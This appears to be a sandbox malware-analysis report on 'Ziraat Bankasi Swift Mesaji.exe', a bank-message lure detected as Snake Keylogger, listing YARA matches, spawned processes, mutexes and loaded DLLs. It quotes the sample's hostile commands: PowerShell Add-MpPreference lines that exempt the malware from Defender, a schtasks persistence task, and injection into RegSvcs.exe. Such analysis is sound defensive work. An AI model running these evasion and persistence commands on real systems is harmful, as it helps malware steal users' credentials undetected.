Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_05A4A714	8_2_05A4A714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_05A4DA20	8_2_05A4DA20

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1764

Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000000.2043677447.0000000000A94000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXfbOZ.exe: vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2306180646.0000000002E21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2310971253.00000000057FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXfbOZ.exe: vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2308972090.00000000040E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2304936787.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.2306180646.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFlatForm.dll2 vs Ziraat Bankasi Swift Mesaji.exe
Source: Ziraat Bankasi Swift Mesaji.exe	Binary or memory string: OriginalFilenameXfbOZ.exe: vs Ziraat Bankasi Swift Mesaji.exe

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, -j-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, -j-.cs	Base64 encoded string: 'k9cni+136fkG8JZl31TcnEVMUE4/RPUtZ3iAqQrRpmlmCYstMl+esWZ5azHUhA4x'
Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, -j-.cs	Base64 encoded string: 'k9cni+136fkG8JZl31TcnEVMUE4/RPUtZ3iAqQrRpmlmCYstMl+esWZ5azHUhA4x'

Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, X2PtWR8nM7XgLEsiB1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/23@2/2

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

File created: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Mutant created: \Sessions\1\BaseNamedObjects\swsFvyWbYbLCSFbrzYSJOkhPg
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6396
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5520

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE679.tmp

Jump to behavior

Source: Ziraat Bankasi Swift Mesaji.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ziraat Bankasi Swift Mesaji.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000008.00000002.4521556409.0000000003148000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003138000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4524082137.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.000000000317E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.0000000003156000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4521556409.000000000318A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ziraat Bankasi Swift Mesaji.exe	Virustotal: Detection: 36%
Source: Ziraat Bankasi Swift Mesaji.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

File read: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1764
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1304
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
